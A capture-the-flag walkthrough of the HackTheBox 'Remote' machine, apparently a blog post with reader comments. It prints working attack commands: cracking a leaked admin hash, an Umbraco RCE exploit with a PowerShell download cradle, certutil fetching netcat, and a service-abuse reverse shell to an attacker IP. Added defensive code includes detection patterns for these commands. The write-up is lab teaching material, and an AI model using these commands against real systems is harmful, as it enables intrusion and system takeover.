Remote HacktheBox Walkthrough
This is the Remote HackTheBox walkthrough. In this writeup I will show you how I exploited the Remote machine and got the root flag. The Remote machine is given difficulty level low by its maker. So, without wasting time, let’s jump into the box. Connect your PC to the VPN so that you can reach the Remote machine. Once connected, confirm access by pinging the IP 10.10.10.180 [IP of the Remote HTB machine].
Now I will show you how I got root to this machine.
First of all I scanned the IP 10.10.10.180 to find the open ports and grab the banners of the services running on them. For this task I used nmap (a network port scanner). Here is the command:
$nmap -sC -sV -oA scan 10.10.10.180
The nmap result shows that port 21 is open and an FTP service is running on it. Anonymous login is also allowed, which is interesting. So first of all I tried to log in with the credentials anonymous : anonymous and got logged in successfully.
Anonymous FTP Login
All the commands worked but showed no output. Then I tried to upload a blank text file named inject.txt, but got a permission denied error. Then I tried to download all the shared files (if any) from the FTP server, in case I had missed some files in the anonymous session:
$wget -m ftp://anonymous:[email protected]
which showed that there is nothing to download, or that we don’t have enough permission to access it.
That’s all for the FTP service. Let’s move on to the other services.
Enumerating on Port 80
Port 80 is open, so there is probably a web server running on it. Let’s check it.
After scrolling to the bottom of http://10.10.10.180/ I saw Umbraco HQ, and on the product page I saw Umbraco printed on a jacket. There were also some balls with Umbraco written on each of them. I didn’t know why the same name was written on every page, all pointing to Umbraco.
Seriously, I didn’t know. I downloaded the image of the man from http://10.10.10.180/media/1002/18095416144_44a566a5f4_h.jpg by right-clicking on it and then searched for 18095416144_44a566a5f4_h.jpg on Google. Luckily, the third link was https://our.umbraco.com/documentation/Umbraco-Heartcore/API-Documentation/Content-Management/media/ and that page showed that Umbraco is actually a CMS (a Content Management System, just like WordPress).
So this confirmed that the website is running on Umbraco CMS, an open source Content Management System.
Tip: If you find a CMS in use, check GitHub for a scanner written for that particular CMS. If one exists, scan the website with it; this may give faster and more accurate results.
So far I knew which CMS the website was running on. To proceed further I needed the installation folder of the CMS and the version of the CMS, so that I could search for a public exploit. I left it there and tried to find some other means of getting the installation folder and version of the CMS. Also, I could not find any Umbraco CMS scanner on GitHub.
Port 111 is open, so let’s enumerate it. It is running the rpcbind service. The nmap scan report clearly shows rpcinfo (Remote Procedure Call information) and a list of ports along with their services. To confirm this and remove false positives you can use the rpcinfo command, which reveals the exact running services.
$ rpcinfo -p 10.10.10.180
Rpcinfo revealed that the nfs [Network File System] and mountd services are running, so I used the showmount command to list the directories that can be mounted on our local machine.
Checking Mount Directory
$showmount --exports 10.10.10.180
The showmount command reveals that /site_backups can be mounted on our local machine. So I mounted the directory /site_backups on my local computer inside the folder /tmp/mounted_folder.
Mounting to Local Computer
$mount --types nfs 10.10.10.180:/site_backups /tmp/mounted_folder/
The mounted backup contains an Umbraco folder, so the installation URL for Umbraco is http://10.10.10.180/Umbraco/. Now I needed the version of Umbraco. I had no idea which file it is stored in, so I googled it, and that gave me the answer: the version is stored in Web.config under the umbracoConfigurationStatus key.
$cat Web.config | grep 'umbracoConfigurationStatus'
As soon as I got the version of Umbraco (7.12.4), I immediately searched for available exploits with searchsploit (a command line tool for searching the Exploit-DB database). I got an exploit: Authenticated Remote Code Execution (46153.py).
Search Available Exploits
$ searchsploit Umbraco 7.12.4
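The steps above (mount the exported backup, locate Web.config, read umbracoConfigurationStatus) are exactly what an auditor should run against a share before it is exported. The following added example, which is not part of the original walkthrough or of any Umbraco tooling, parses a Web.config for the version key and walks a backup set to list what an anonymous mount would disclose. The sample backup contents are constructed here; only the umbracoConfigurationStatus key is taken from the page.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

# Constructed sample of what an exported site backup might contain. Paths and
# contents are illustrative, not copied from the machine; umbracoConfigurationStatus
# is the real Web.config key the walkthrough greps for.
SAMPLE_BACKUP: Dict[str, bytes] = {
    "Web.config": b"""<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <appSettings>
    <add key="umbracoConfigurationStatus" value="7.12.4" />
  </appSettings>
  <connectionStrings>
    <add name="umbracoDbDSN"
         connectionString="Data Source=|DataDirectory|\\Umbraco.sdf;Flush Interval=1"
         providerName="System.Data.SqlServerCe.4.0" />
  </connectionStrings>
</configuration>
""",
    "App_Data/Umbraco.sdf": b"\x00placeholder-sqlce-bytes",
    "Umbraco/Views/Default.cshtml": b"@inherits Umbraco.Web.Mvc.UmbracoViewPage",
    "css/site.css": b"body { margin: 0 }",
}

# File types that hold data or secrets and have no business on a world-readable export.
SENSITIVE_SUFFIXES = (".sdf", ".mdf", ".bak", ".config")


def umbraco_version(web_config: bytes) -> Optional[str]:
    """Return the umbracoConfigurationStatus value from a Web.config, or None."""
    root = ET.fromstring(web_config)
    for add in root.iterfind("./appSettings/add"):
        if add.get("key") == "umbracoConfigurationStatus":
            return add.get("value")
    return None


def has_connection_strings(web_config: bytes) -> bool:
    """True when the Web.config carries a <connectionStrings> entry (DB path or credentials)."""
    return ET.fromstring(web_config).find("./connectionStrings/add") is not None


def audit_backup(files: Dict[str, bytes]) -> List[Tuple[str, str]]:
    """Walk a backup set and report what it discloses to anyone who can mount it."""
    findings: List[Tuple[str, str]] = []
    top_level_dirs = {p.split("/", 1)[0] for p in files if "/" in p}
    if "Umbraco" in top_level_dirs:
        findings.append(("Umbraco/", "back-office folder reveals the admin URL path"))
    for path, data in sorted(files.items()):
        name = path.rsplit("/", 1)[-1].lower()
        if name == "web.config":
            version = umbraco_version(data)
            if version:
                findings.append((path, f"discloses Umbraco version {version}"))
            if has_connection_strings(data):
                findings.append((path, "contains database connection strings"))
        elif name.endswith(SENSITIVE_SUFFIXES):
            findings.append((path, "database or configuration file exposed"))
    return findings


if __name__ == "__main__":
    for path, issue in audit_backup(SAMPLE_BACKUP):
        print(f"{path}: {issue}")
```

Run against a real mount point you would replace the dictionary with a walk of the directory; the point is that a version string plus a database file in one export is enough to go from "unknown web app" to "known CVE with credentials", so backups belong on authenticated storage, not an open NFS export.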
Going to http://10.10.10.180/umbraco showed a login panel which requires a username and password. I tried to log in with the default credentials admin : admin and admin : password but they failed. So I searched our mounted_folder for credentials.
After some enumeration I found a file named Umbraco.sdf [an .sdf file contains a SQL database in compact form] and used the strings command to view the file contents, grepping for admin as shown below:
$strings Umbraco.sdf | grep admin
It contains the username [email protected] and a password in SHA1 hash form, ‘b8be16afba8c314ad33d812f22a04991b90e2aaa‘. I searched for the hash on some public online databases and luckily found its password on crackstation.net: baconandcheese. So the login credentials are [email protected] : baconandcheese.
Tip: If you get a hash, first search for it online in databases like crackstation.net to see whether its value is already known. If it is not found, try to crack it on your own machine with a custom wordlist using John the Ripper or Hashcat.
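Why did an online lookup recover this password instantly? The stored value is an unsalted SHA-1 digest, so a precomputed table of word to digest answers it with one dictionary lookup. The added example below (my own code, not from the walkthrough or from Umbraco) models that lookup against a constructed wordlist and then shows the storage scheme an application should use instead: salted, iterated PBKDF2-HMAC-SHA256 with a constant-time comparison. The round count is an assumed work factor.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# The stored hash on the page is an unsalted SHA-1 hex digest. Anyone holding a
# precomputed table of word -> SHA-1 (which is what an online lookup service is)
# recovers the password with one dictionary lookup per hash. The salted, iterated
# scheme further down forces per-password work and makes shared tables useless.


def legacy_sha1(password: str) -> str:
    """Unsalted SHA-1 hex digest: the weak scheme found in the backup database."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def table_lookup(stored_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Model of a precomputed lookup table: build word->digest once, then a dict hit
    recovers any unsalted hash whose input is in the list. A per-user salt defeats this
    because the table would have to be rebuilt for every salt value."""
    table = {legacy_sha1(word): word for word in wordlist}
    return table.get(stored_hex.lower())


PBKDF2_ROUNDS = 200_000  # assumed work factor; tune to your hardware budget


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored with its parameters so they can be raised later."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds; compare in constant time."""
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    # Constructed wordlist; the hash from the page is matched only if its input
    # happens to be in the table, exactly as with an online lookup service.
    page_hash = "b8be16afba8c314ad33d812f22a04991b90e2aaa"
    words = ["password", "admin", "baconandcheese"]
    print("legacy lookup result:", table_lookup(page_hash, words))
    stored = hash_password("baconandcheese")
    print("salted record:", stored)
    print("verify correct password:", verify_password("baconandcheese", stored))
    # Same password, fresh salt -> different record, so no shared table applies.
    print("records differ:", stored != hash_password("baconandcheese"))
```

The two halves differ in exactly one property: with the legacy scheme the attacker's work is shared across every user on every site, while with a random salt and a high round count every guess must be recomputed per account, which is what turns a leaked database from an instant compromise into a cost problem.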
As there is an authenticated RCE vulnerability in Umbraco 7.12.4, I searched GitHub for an Umbraco RCE exploit and its usage. I found https://github.com/noraj/Umbraco-RCE and downloaded it. Then I downloaded the PowerShell script Invoke-PowerShellTcp.ps1 from https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1, which connects back to the netcat listener on our PC, and replaced the old IP address in it with my local PC’s IP address and port 5555.
I started a Python HTTP server in one window and a netcat listener with rlwrap in another. I used rlwrap so that, after getting the remote shell, the backspace and tab keys work smoothly. After executing
$python exploit.py -u [email protected] -p baconandcheese -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1')"
Start Python Http Server
$python3 -m http.server 80
Start NetCat Listener
$rlwrap nc -nvlp 5555
I got a remote shell. So, using this exploit, I logged in successfully to the remote PC.
Gathering some useful info
Let’s grab user flag
Finding PrivEsc Vector
To escalate privileges to admin level, first of all I had to know the privilege escalation vector; only then could I proceed to the exploitation part. I used the PowerUp.ps1 script, loaded remotely, to look for possible privilege escalation vectors. The following command runs it directly on the remote PC; after loading it, don’t forget to run all of its checks (Invoke-AllChecks).
Running PrivEsc Script
$ IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/PowerUp.ps1')
Tip: Every time you get access to a PC, run an enumeration script so that you get information about possible privilege escalation vectors.
UsoSvc could be our potential privilege escalation vector. Let’s try to exploit it. To exploit this service we need a program on the remote machine that can connect back to a listener on my PC. So I downloaded netcat from https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip and pulled nc64.exe onto the remote machine from my PC. Finally I ran the service abuse command given in the PowerUp.ps1 output to get an administrative remote shell.
Download nc64.exe to Remote
$certutil.exe -urlcache -f http://10.10.14.9/nc64.exe C:\Windows\Temp\nc64.exe
Start Python Http Server Locally
$python3 -m http.server 80
Start NetCat Listener Locally
$rlwrap nc -nvlp 1234
Run the Service Abuse Command
$Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command "C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe"
We can see that we have successfully got an administrative shell. Now we can get our root flag.
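Every step of the post-exploitation chain above leaves a distinct trace on the target: the IEX download cradle shows up in PowerShell script block logging, the certutil fetch in process creation telemetry, and the service abuse as a service whose binary path points at a temp directory with a shell hand-off on its command line. The added example below (my own detection code, not part of the walkthrough or of PowerUp) runs three such rules over constructed sample events; the field names are assumptions to be mapped onto your own log schema.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry, modelled on what the steps above would leave behind
# on the target: PowerShell script-block text, process command lines, and service
# configuration records. Field names are my own; map them to your SIEM's schema.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"source": "powershell_scriptblock", "host": "REMOTE",
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1')"},
    {"source": "powershell_scriptblock", "host": "REMOTE",
     "text": "Get-ChildItem C:\\inetpub\\wwwroot | Select-Object Name"},
    {"source": "process_create", "host": "REMOTE",
     "cmdline": "certutil.exe -urlcache -f http://10.10.14.9/nc64.exe C:\\Windows\\Temp\\nc64.exe"},
    {"source": "process_create", "host": "REMOTE",
     "cmdline": "certutil.exe -verify C:\\certs\\site.cer"},
    {"source": "service_config", "host": "REMOTE", "name": "UsoSvc",
     "path": "C:\\Windows\\Temp\\nc64.exe 10.10.14.9 1234 -e cmd.exe"},
    {"source": "service_config", "host": "REMOTE", "name": "Spooler",
     "path": "C:\\Windows\\System32\\spoolsv.exe"},
]

# Download-and-execute cradle: Invoke-Expression over content pulled with WebClient.
DOWNLOAD_CRADLE = re.compile(r"(?i)\b(IEX|Invoke-Expression)\b.*\b(DownloadString|DownloadFile)\b")
# certutil's URL-cache switch fetching from http(s): a living-off-the-land download.
CERTUTIL_FETCH = re.compile(r"(?i)\bcertutil(\.exe)?\b.*\s-urlcache\b.*https?://")
# Service binaries normally live under these roots; anything else deserves a look.
TRUSTED_SERVICE_ROOTS = ("c:\\windows\\system32\\", "c:\\program files\\",
                         "c:\\program files (x86)\\")
# A service command line that hands a shell to another program is never legitimate.
SHELL_HANDOFF = re.compile(r"(?i)\s-e\s+cmd(\.exe)?\b")


def service_path_suspicious(path: str) -> bool:
    """Triage heuristic for a service's binary path (a lead, not proof of compromise)."""
    exe = path.strip().lstrip('"').lower()
    outside_trusted = not any(exe.startswith(root) for root in TRUSTED_SERVICE_ROOTS)
    return outside_trusted or bool(SHELL_HANDOFF.search(path))


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (host, rule, evidence) for every event that trips a rule."""
    hits: List[Tuple[str, str, str]] = []
    for ev in events:
        src = ev["source"]
        if src == "powershell_scriptblock" and DOWNLOAD_CRADLE.search(ev["text"]):
            hits.append((ev["host"], "powershell_download_cradle", ev["text"]))
        elif src == "process_create" and CERTUTIL_FETCH.search(ev["cmdline"]):
            hits.append((ev["host"], "certutil_remote_fetch", ev["cmdline"]))
        elif src == "service_config" and service_path_suspicious(ev["path"]):
            hits.append((ev["host"], f"service_binary_path:{ev['name']}", ev["path"]))
    return hits


if __name__ == "__main__":
    for host, rule, evidence in detect(SAMPLE_EVENTS):
        print(f"[{host}] {rule}: {evidence}")
```

The service rule is deliberately loose (plenty of vendor services live outside the listed roots), so treat its output as a review queue; the cradle and certutil rules are precise enough to alert on. The underlying mitigation for the last step is the same one PowerUp is looking for: a service whose configuration can be modified by an unprivileged user, which is a permissions audit, not a detection problem.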
I hope you have learned something from this Remote HackTheBox walkthrough and my methodology. If so, please say so in the comment section. For any query or suggestion, feel free to contact us at [email protected]
This Post Has 8 Comments
Could you send me the PowerUp.ps1? I would be grateful.
It seems that this part is not functional anymore:
Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command "C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe"
Start-Service : Service ‘Update Orchestrator Service (UsoSvc)’ cannot be started due to the following error: Cannot
start service UsoSvc on computer ‘.’.
At line:1812 char:34
+ … $TargetService | Start-Service -ErrorAction SilentlyContinue
+ CategoryInfo : OpenError: (System.ServiceProcess.ServiceController:ServiceController) [Start-Service],
+ FullyQualifiedErrorId : CouldNotStartService,Microsoft.PowerShell.Commands.StartServiceCommand
I worked around it by doing this:
Set-ServiceBinPath -ServiceName 'UsoSvc' "C:\Windows\Temp\nc64.exe 10.10.14.9 1234 -e cmd.exe"
NOTICE: the service is only functional for around 5 min, enough to catch the root flag, but why is it broken after this time period? Antivirus?
Very good job done in this walkthrough !!
How, without giving the tun0 IP and port, were you able to get a reverse shell, and where had you defined port 5555 in the script??
I changed the IP address to the tun0 IP and the port to 5555 in the PowerShell script Invoke-PowerShellTcp.ps1 before downloading it to the Remote HTB machine through the Python HTTP server.
Can you explain to me exactly what this PowerShell statement does: -i http://10.10.10.180/ -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1')"
This statement downloads and executes the Invoke-PowerShellTcp.ps1 script on the remote machine in one go by loading it into memory.